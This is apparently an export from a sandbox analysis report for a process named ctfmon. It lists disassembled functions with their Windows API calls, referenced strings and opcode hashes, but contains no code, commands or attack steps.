Associated: 00000003.00000002.4563169750.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563210383.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563228138.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563244904.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563244904.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563318813.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_ctfmon.jbxd

Similarity

API ID: Window$Rect$ClientCtrlLongScreen
String ID:
API String ID: 1315500227-0
Opcode ID: 7be549c15be2d0881abb1e3d0c118bfa54edfa45425f65dce38ef14f92b6c35a
Instruction ID: 1c1bb1606c7b6fcb0188c767b7bd5df6e6ab6d9813dcdc4c782d48c425fdd25b
Opcode Fuzzy Hash: 7be549c15be2d0881abb1e3d0c118bfa54edfa45425f65dce38ef14f92b6c35a
Instruction Fuzzy Hash: 6F018435340135BBDB219F55AC48EEF7B6CFF06710F818032F911A1164DB34D9568B98

Function 004099B9 Relevance: 9.0, APIs: 3, Strings: 2, Instructions: 280memoryCOMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 004099BE
CoTaskMemAlloc.OLE32(?,?,?,00000000), ref: 00409ADA
CoTaskMemFree.OLE32(?,?,00000000), ref: 00409CC1

Strings

, xrefs: 00409B96
(, xrefs: 00409CB5

Memory Dump Source

Source File: 00000003.00000002.4563185497.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.4563169750.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563210383.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563228138.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563244904.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563244904.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563318813.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_ctfmon.jbxd

Similarity

API ID: Task$AllocFreeH_prolog
String ID: $(
API String ID: 1522537378-55695022
Opcode ID: 7e69d556818cd5a1851330303f45f1f73408314ae1e8427cd738d52b82eff929
Instruction ID: e45d171d2f1bb2aaac46846c8d0f16db648deb0d3cfea91ab4a4292c5bbd6be5
Opcode Fuzzy Hash: 7e69d556818cd5a1851330303f45f1f73408314ae1e8427cd738d52b82eff929
Instruction Fuzzy Hash: 7AB10970A002059FDB14DFA9C884AAEFBF5FF88304B20496EE016EB291D775AD45CF54

Function 004048D0 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 137networkCOMMON

Download Yara Rule

APIs

select.WS2_32(00000001,?,00000000,00000000,00000014), ref: 0040491E
recv.WS2_32(00000000,030E0000,000186A0,00000000), ref: 00404953
closesocket.WS2_32(00000000), ref: 00404A22
closesocket.WS2_32(00000000), ref: 00404A46

Strings

+*&=^^^^--------PTPM1, xrefs: 0040498A, 00404A57

Memory Dump Source

Source File: 00000003.00000002.4563185497.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.4563169750.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563210383.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563228138.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563244904.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563244904.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563318813.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_ctfmon.jbxd

Similarity

API ID: closesocket$recvselect
String ID: +*&=^^^^--------PTPM1
API String ID: 3519190455-393624235
Opcode ID: 27ed70f289c475a146f3c2e7ccf0ebaab3ee20ce23d8714a6e4ca9bd04cb5120
Instruction ID: a15c9d51dc272b9fe545b8961346552fe0b4d2b02f1de687d51cf6678d7e3f35
Opcode Fuzzy Hash: 27ed70f289c475a146f3c2e7ccf0ebaab3ee20ce23d8714a6e4ca9bd04cb5120
Instruction Fuzzy Hash: 6951B2762002009FC704CF24FC40B67BBF5F7A8314F548539E994A73A1D7B9A989EBA5

Function 004102A3 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 115COMMON

Download Yara Rule

APIs

GetVersionExA.KERNEL32 ref: 004102C2
GetEnvironmentVariableA.KERNEL32(__MSVCRT_HEAP_SELECT,?,00001090), ref: 004102F7
GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 00410357

Strings

__MSVCRT_HEAP_SELECT, xrefs: 004102F2
__GLOBAL_HEAP_SELECTED, xrefs: 00410331

Memory Dump Source

Source File: 00000003.00000002.4563185497.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.4563169750.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563210383.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563228138.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563244904.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563244904.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563318813.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_ctfmon.jbxd

Similarity

API ID: EnvironmentFileModuleNameVariableVersion
String ID: __GLOBAL_HEAP_SELECTED$__MSVCRT_HEAP_SELECT
API String ID: 1385375860-4131005785
Opcode ID: bfe30102a0c4b2ab94a83b46ebd1f32b03c0ef1caef6cc2600ff381d8645089f
Instruction ID: 126d5043a1f7e65bc2068d23c44456634c671ba06e8d0b95b91ab4156e3e84ef
Opcode Fuzzy Hash: bfe30102a0c4b2ab94a83b46ebd1f32b03c0ef1caef6cc2600ff381d8645089f
Instruction Fuzzy Hash: 44314A7194534CAFEB3187705C95BDF37689B06308F5404DBD894D6242D6F88EC68B1D

Function 004222F0 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 101windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000433,00000000,?), ref: 004223A9
GetWindowLongW.USER32(?,000000FC), ref: 004223BA
GetWindowLongW.USER32(?,000000FC), ref: 004223CA
SetWindowLongW.USER32(?,000000FC,?), ref: 004223E6

Strings

(, xrefs: 00422394

Memory Dump Source

Source File: 00000003.00000002.4563185497.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.4563169750.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563210383.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563228138.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563244904.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563244904.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563318813.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_ctfmon.jbxd

Similarity

API ID: LongWindow$MessageSend
String ID: (
API String ID: 2178440468-3887548279
Opcode ID: 3bf4c99cb503225f52b8dd62f2c612ffa84565c72bf3dd4d27c3f5495f9711c6
Instruction ID: 0887fd1d8c57f0dc07a948d484ba5af13b1aab812eb589b308dbb2651f147842
Opcode Fuzzy Hash: 3bf4c99cb503225f52b8dd62f2c612ffa84565c72bf3dd4d27c3f5495f9711c6
Instruction Fuzzy Hash: 8E31AE31700620AFDB21EF75E984B6FBBA4BF04314F90452EE94197691DBB9A805CB98

Function 00409201 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 98COMMON

Download Yara Rule

APIs

VariantClear.OLEAUT32(?), ref: 00409271
SysFreeString.OLEAUT32(?), ref: 004092E0
SysFreeString.OLEAUT32(?), ref: 004092EA
SysFreeString.OLEAUT32(?), ref: 004092F4

Strings

`DvP?Dv, xrefs: 004092D2

Memory Dump Source

Source File: 00000003.00000002.4563185497.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.4563169750.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563210383.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563228138.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563244904.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563244904.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563318813.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_ctfmon.jbxd

Similarity

API ID: FreeString$ClearVariant
String ID: `DvP?Dv
API String ID: 3349467263-2995021381
Opcode ID: c6ed0a969ed6b6261a651c332f025beb1c08d77c40190fe13384ae6ea06520fe
Instruction ID: 3575c1e55b8ebace504c8559d5d8e129edef3a0f818806659e3e1524f78f469a
Opcode Fuzzy Hash: c6ed0a969ed6b6261a651c332f025beb1c08d77c40190fe13384ae6ea06520fe
Instruction Fuzzy Hash: 6E313971A00229FFCB14DFA5C884ADEBBB8FF48710F50842AF509A6281D774A944CFA4

Function 00429229 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 88stringCOMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32(00000000,?,00000104,?,?), ref: 0042925A

Part of subcall function 00429348: lstrlenW.KERNEL32(?,0042928B,?,?), ref: 0042937C

lstrcpyW.KERNEL32(?,.HLP,?,?,00000104), ref: 004292FB
lstrcatW.KERNEL32(?,.INI,?,?,00000104), ref: 0042932A

Strings

.HLP, xrefs: 004292F3
.INI, xrefs: 00429324

Memory Dump Source

Source File: 00000003.00000002.4563185497.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.4563169750.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563210383.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563228138.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563244904.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563244904.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563318813.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_ctfmon.jbxd

Similarity

API ID: FileModuleNamelstrcatlstrcpylstrlen
String ID: .HLP$.INI
API String ID: 2421895198-3011182340
Opcode ID: 32c3fdbe47f13a2511c981e50f3e73462810435089390b33b1753ebd04fc943f
Instruction ID: 5354100141cd0111f2c83c4e759e606604062e502d5c36874ba2bea8a0f2629b
Opcode Fuzzy Hash: 32c3fdbe47f13a2511c981e50f3e73462810435089390b33b1753ebd04fc943f
Instruction Fuzzy Hash: E53142B1900719EFDB20DFA5D885AC6B7F8AF08304F5049BBE54AD3151DB34AD848B68

Function 0042703B Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 87windowCOMMON

Download Yara Rule

APIs

Part of subcall function 004271B3: GetParent.USER32(?), ref: 004271E6
Part of subcall function 004271B3: GetLastActivePopup.USER32(?), ref: 004271F5
Part of subcall function 004271B3: IsWindowEnabled.USER32(?), ref: 0042720A
Part of subcall function 004271B3: EnableWindow.USER32(?,00000000), ref: 0042721D

SendMessageW.USER32(?,00000376,00000000,00000000), ref: 00427071
GetModuleFileNameW.KERNEL32(00000000,?,00000104,00000000,?,00000000), ref: 004270DF
MessageBoxW.USER32(00000000,?,?,00000000), ref: 004270ED
EnableWindow.USER32(00000000,00000001), ref: 00427109

Strings

PMB, xrefs: 0042703B

Memory Dump Source

Source File: 00000003.00000002.4563185497.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.4563169750.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563210383.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563228138.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563244904.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563244904.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563318813.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_ctfmon.jbxd

Similarity

API ID: Window$EnableMessage$ActiveEnabledFileLastModuleNameParentPopupSend
String ID: PMB
API String ID: 1958756768-1324934742
Opcode ID: ce7fb727ab09d04d5f3f623b72e458f79ee0fa9dbac5fe75b105723b8ce71699
Instruction ID: 4949e603ba3b1f5991230ca5172b941e34d29e6685895596331aeb27549c8e70
Opcode Fuzzy Hash: ce7fb727ab09d04d5f3f623b72e458f79ee0fa9dbac5fe75b105723b8ce71699
Instruction Fuzzy Hash: 8521D672B04128AFDB209F94DCC5BAFB7B9EB44350F94042AE514E3350C7799D498BA4

Function 00420EB3 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 56windowCOMMON

Download Yara Rule

APIs

GetWindowLongW.USER32(?,000000F0), ref: 00420EF4
GetDlgItem.USER32(?,00000002), ref: 00420F13
IsWindowEnabled.USER32(00000000), ref: 00420F1E
SendMessageW.USER32(?,00000111,00000002,00000000), ref: 00420F34

Strings

Edit, xrefs: 00420EFE

Memory Dump Source

Source File: 00000003.00000002.4563185497.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.4563169750.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563210383.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563228138.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563244904.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563244904.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563318813.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_ctfmon.jbxd

Similarity

API ID: Window$EnabledItemLongMessageSend
String ID: Edit
API String ID: 3499652902-554135844
Opcode ID: c0a5469a5a856ea4fc2de64ab117f76beaec6be51fad4795c6557c1e6c80bc8f
Instruction ID: 60899dcfc3587a15ced3cc413fca3ebc9283b805f23eb41fcd32d928ea0cbd6c
Opcode Fuzzy Hash: c0a5469a5a856ea4fc2de64ab117f76beaec6be51fad4795c6557c1e6c80bc8f
Instruction Fuzzy Hash: 40010830380231AAEA306B26BD09B7BB7E59F10760FD24427F401E22E2CBE8D856C11C

Function 0042657D Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 42COMMON

Download Yara Rule

APIs

GetWindowExtEx.GDI32(?,00407774,00000000,?,?,?,00407774,?,?,?,?,?,?,00000000,00000000), ref: 0042658E
GetViewportExtEx.GDI32(?,?,?,00407774,?,?,?,?,?,?,00000000,00000000), ref: 0042659B
MulDiv.KERNEL32(00407774,00000000,00000000), ref: 004265C0
MulDiv.KERNEL32(46892C46,00000000,00000000), ref: 004265DB

Strings

tw@, xrefs: 0042657D

Memory Dump Source

Source File: 00000003.00000002.4563185497.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.4563169750.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563210383.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563228138.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563244904.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563244904.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563318813.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_ctfmon.jbxd

Similarity

API ID: ViewportWindow
String ID: tw@
API String ID: 1589084482-3122378559
Opcode ID: 5bbac0ae4d7fb4264335a9c4321448357a773c21af9a9bff716acac9ab490366
Instruction ID: ce0e09d475a622cb5eb5a1da7693da6cd9b819a777b60fa32cf6f8d38c90c4e5
Opcode Fuzzy Hash: 5bbac0ae4d7fb4264335a9c4321448357a773c21af9a9bff716acac9ab490366
Instruction Fuzzy Hash: 7AF01D72400108FFEB156BA2EC05CBEBBBDEF90314754487AF851A3170DB726D619B94

Function 0040FFEC Relevance: 7.6, APIs: 5, Instructions: 150COMMON

Download Yara Rule

APIs

GetStartupInfoA.KERNEL32(?), ref: 0041004A
GetFileType.KERNEL32(?,?,00000000), ref: 004100F5
GetStdHandle.KERNEL32(-000000F6,?,00000000), ref: 00410158
GetFileType.KERNEL32(00000000,?,00000000), ref: 00410166
SetHandleCount.KERNEL32 ref: 0041019D

Memory Dump Source

Source File: 00000003.00000002.4563185497.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.4563169750.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563210383.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563228138.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563244904.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563244904.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563318813.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_ctfmon.jbxd

Similarity

API ID: FileHandleType$CountInfoStartup
String ID:
API String ID: 1710529072-0
Opcode ID: c4614b89e3f0e78a588a77f40bdc57e04f10cb5bb0fe7c99d5bd66e85f2c9a8e
Instruction ID: 9efafb25e1c49cefaa9801ddeb0c15ad3ba9d2cf75d41a5d73fe4d8c6704c713
Opcode Fuzzy Hash: c4614b89e3f0e78a588a77f40bdc57e04f10cb5bb0fe7c99d5bd66e85f2c9a8e
Instruction Fuzzy Hash: 855138315042059BC7208B68DC847EA7BE0FB16338F24466EC592DB2E1D7BED8DAC759

Function 00406B35 Relevance: 7.6, APIs: 5, Instructions: 127windowthreadCOMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00406B3A
SendMessageW.USER32(?,00000138,?,?), ref: 00406BD4
GetBkColor.GDI32(?), ref: 00406BDD
GetTextColor.GDI32(?), ref: 00406BE9
GetThreadLocale.KERNEL32 ref: 00406C78

Memory Dump Source

Source File: 00000003.00000002.4563185497.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.4563169750.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563210383.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563228138.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563244904.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563244904.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563318813.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_ctfmon.jbxd

Similarity

API ID: Color$H_prologLocaleMessageSendTextThread
String ID:
API String ID: 741590120-0
Opcode ID: f7053f1ad1be2417574c4c939892cdd83a9888b3ce4a9b4dd911e18ce2a993c2
Instruction ID: f9e5b8384eab3ba489f7196092203c7d724fd180af1cedfd33864e84ada0d436
Opcode Fuzzy Hash: f7053f1ad1be2417574c4c939892cdd83a9888b3ce4a9b4dd911e18ce2a993c2
Instruction Fuzzy Hash: 1051AF70914716DFDB20DF65C9404AAB7F0FF14314B22852EE897AB3A0E738E961CB59

Function 0042A6D8 Relevance: 7.6, APIs: 5, Instructions: 81memoryCOMMON

Download Yara Rule

APIs

SysAllocString.OLEAUT32(?), ref: 0042A739

Part of subcall function 00424B39: LoadStringW.USER32(?,?,?,?), ref: 00424B50

SysAllocString.OLEAUT32(?), ref: 0042A748
SysAllocString.OLEAUT32(?), ref: 0042A78E
SysAllocString.OLEAUT32(?), ref: 0042A7A2
SysAllocString.OLEAUT32(?), ref: 0042A7BF

Memory Dump Source

Source File: 00000003.00000002.4563185497.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.4563169750.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563210383.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563228138.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563244904.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563244904.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563318813.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_ctfmon.jbxd

Similarity

API ID: String$Alloc$Load
String ID:
API String ID: 3862620831-0
Opcode ID: f6ca087355628dbc399f6843932c52c76a3f68a4c4011377d4e366b53c13f2f5
Instruction ID: 6803650498ba4989a99e64115ce7b714a56dc8d8622e699d9d0cda383d46dfbc
Opcode Fuzzy Hash: f6ca087355628dbc399f6843932c52c76a3f68a4c4011377d4e366b53c13f2f5
Instruction Fuzzy Hash: F8317C30600710AFC720EF26E885B5AB7F5BF84700F50892BE85997691D778E891CB9A

Function 0041C930 Relevance: 7.6, APIs: 5, Instructions: 78COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4563185497.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.4563169750.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563210383.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563228138.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563244904.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563244904.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563318813.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_ctfmon.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0267abc6433f213ff09637eccae298c1139d1c86d54d5fa1176bbc9bac3441c6
Instruction ID: 5f9584f858f3fd3441d1eeae4cb6474de1c9940f427edf65aea8a548a520b4bc
Opcode Fuzzy Hash: 0267abc6433f213ff09637eccae298c1139d1c86d54d5fa1176bbc9bac3441c6
Instruction Fuzzy Hash: 8D31B475650210AFD330DF19EC856E637A0FBA1358F20653AD60AC72E1D734988ECB94

Function 004278C7 Relevance: 7.6, APIs: 5, Instructions: 58COMMON

Download Yara Rule

APIs

GetMapMode.GDI32(?,?,?,?,?,?,00407740,?,00000000,?,?,?,?,?,?,?), ref: 004278D7
GetDeviceCaps.GDI32(?,00000058), ref: 00427911
GetDeviceCaps.GDI32(?,0000005A), ref: 0042791A

Part of subcall function 004265E6: GetWindowExtEx.GDI32(?,?,00000000,?,?,00000000,?,?,?,?,?,?,?,00000000,00000000), ref: 004265F7
Part of subcall function 004265E6: GetViewportExtEx.GDI32(?,?,?,?,?,?,?,00000000,00000000), ref: 00426604
Part of subcall function 004265E6: MulDiv.KERNEL32(?,00000000,00000000), ref: 00426629
Part of subcall function 004265E6: MulDiv.KERNEL32(00000002,00000000,00000000), ref: 00426644

MulDiv.KERNEL32(?,000009EC,00000060), ref: 0042793E
MulDiv.KERNEL32(00000002,000009EC,?), ref: 00427949

Memory Dump Source

Source File: 00000003.00000002.4563185497.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.4563169750.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563210383.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563228138.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563244904.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563244904.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563318813.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_ctfmon.jbxd

Similarity

API ID: CapsDevice$ModeViewportWindow
String ID:
API String ID: 2598972148-0
Opcode ID: 82fb9aefea54476f9e4efb772e43ca4f4989d83242b50b67186938c72895dec2
Instruction ID: 6e5dd03be2f2a077cc23b63b074e70d19be67c8710d15462bb73e943247fa81e
Opcode Fuzzy Hash: 82fb9aefea54476f9e4efb772e43ca4f4989d83242b50b67186938c72895dec2
Instruction Fuzzy Hash: C211CE71700624EFEB21AF55EC44C2FBBE9EF88750B51402AE98597321D771AC829F54

Function 0042271F Relevance: 7.6, APIs: 5, Instructions: 52stringregistryCOMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00422724
GetClassInfoW.USER32(?,?,?), ref: 0042273F
RegisterClassW.USER32(00000004), ref: 0042274A
lstrcatW.KERNEL32(00000034,?,00000001), ref: 00422781
lstrcatW.KERNEL32(00000034,00000004), ref: 00422792

Memory Dump Source

Source File: 00000003.00000002.4563185497.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.4563169750.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563210383.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563228138.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563244904.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563244904.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563318813.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_ctfmon.jbxd

Similarity

API ID: Classlstrcat$H_prologInfoRegister
String ID:
API String ID: 106226465-0
Opcode ID: 5646f68694f66a7569b41e42e3248d6500a3e60ab4d64e53f9044bdf58ec9da1
Instruction ID: 6b4f5334b2da6ce01ac7bdb77f7903c950944f1e7d17838be749cb4d6a50b4f5
Opcode Fuzzy Hash: 5646f68694f66a7569b41e42e3248d6500a3e60ab4d64e53f9044bdf58ec9da1
Instruction Fuzzy Hash: 4111E535701324BEDB10AFA1ED81A9E7BB8EF44754F40452EFC05A7151CBB496018B99

Function 0041020F Relevance: 7.5, APIs: 5, Instructions: 38threadCOMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(00000103,7FFFFFFF,0040F933,004152C9,00000000,?,?,00000000,00000001), ref: 00410211
TlsGetValue.KERNEL32(?,?,00000000,00000001), ref: 0041021F
SetLastError.KERNEL32(00000000,?,?,00000000,00000001), ref: 0041026B

Part of subcall function 00413F58: HeapAlloc.KERNEL32(00000008,?,00000000,00000000,00000001,00410234,00000001,00000074,?,?,00000000,00000001), ref: 0041404E

TlsSetValue.KERNEL32(00000000,?,?,00000000,00000001), ref: 00410243
GetCurrentThreadId.KERNEL32 ref: 00410254

Memory Dump Source

Source File: 00000003.00000002.4563185497.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.4563169750.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563210383.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563228138.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563244904.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
